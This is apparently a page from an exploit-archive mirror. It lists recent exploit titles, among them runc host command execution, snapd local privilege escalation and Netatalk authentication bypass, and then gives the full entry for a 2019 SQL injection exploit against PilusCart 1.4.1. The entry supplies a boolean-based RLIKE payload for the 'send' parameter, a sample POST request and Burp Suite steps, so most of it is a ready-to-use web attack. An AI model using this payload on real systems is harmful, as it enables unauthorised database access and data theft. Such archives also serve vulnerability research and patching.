
11 changes to exploits/shellcodes AirDroid 4.2.1.6 - Denial of Service NetworkSleuth 3.0 - 'Name' Denial of Service (PoC) runc< 1.0-rc6 (Docker < 18.09.2) - Host Command Execution Ubuntu snapd < 2.37.1 - Local Privilege Escalation runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1) snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2) Netatalk < 3.1.12 - Authentication Bypass Netatalk 3.1.12 - Authentication Bypass Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure) Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure) Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting PilusCart 1.4.1 - 'send' SQL Injection
34 lines
No EOL
1.6 KiB
Text
34 lines
No EOL
1.6 KiB
Text
####################################################################
|
|
|
|
# Exploit Title: PilusCart 1.4.1 - 'send' SQL Vulnerability
|
|
# Dork: N/A
|
|
# Date: 10-02-2019
|
|
# Exploit Author: Mehmet EMIROGLU
|
|
# Vendor Homepage: https://sourceforge.net/projects/pilus/
|
|
# Software Link: https://sourceforge.net/projects/pilus/
|
|
# Version: 1.4.1
|
|
# Category: Webapps
|
|
# Tested on: Wampp @Win
|
|
# CVE: N/A
|
|
# Software Description: PilusCart is a web-based online store management system, written in PHP scripting language as the most popular web programming language today. To store the data, PilusCart uses MySQL relational database management system.
|
|
|
|
####################################################################
|
|
|
|
# Vulnerabilities / Impact
|
|
# This web application called as PiLuS 1.4.1 version.
|
|
# Switch to the http://localhost/PiLUS/read-apa-itu-pdo
|
|
fill in the red-colored parts that I have given in the link
|
|
https://i.hizliresim.com/MV11La.jpg
|
|
Get in with the burp suite. and add the payload
|
|
at the end of the request to the attack pattern.
|
|
|
|
####################################################################
|
|
|
|
# POC - SQL (Boolean Based String)
|
|
# Parameters : send
|
|
# Attack Pattern : RLIKE (case when 7488715=7488715 then
|
|
0x656d69726f676c75 else 0x28 end)
|
|
# POST Request :
|
|
http://localhost/PiLUS/read-apa-itu-pdo?post_id=3&post_slug=apa-itu-pdo&nama_komentar=4866630&situs_web=9391510&captcha=4551404&token=473ec0c6bda264fefb8447c8ff01956248ea477c&isi_komentar=EMIROGLU2823174&send=Kirim
|
|
RLIKE
|
|
(case when 7488715=7488715 then 0x656d69726f676c75 else 0x28 end) |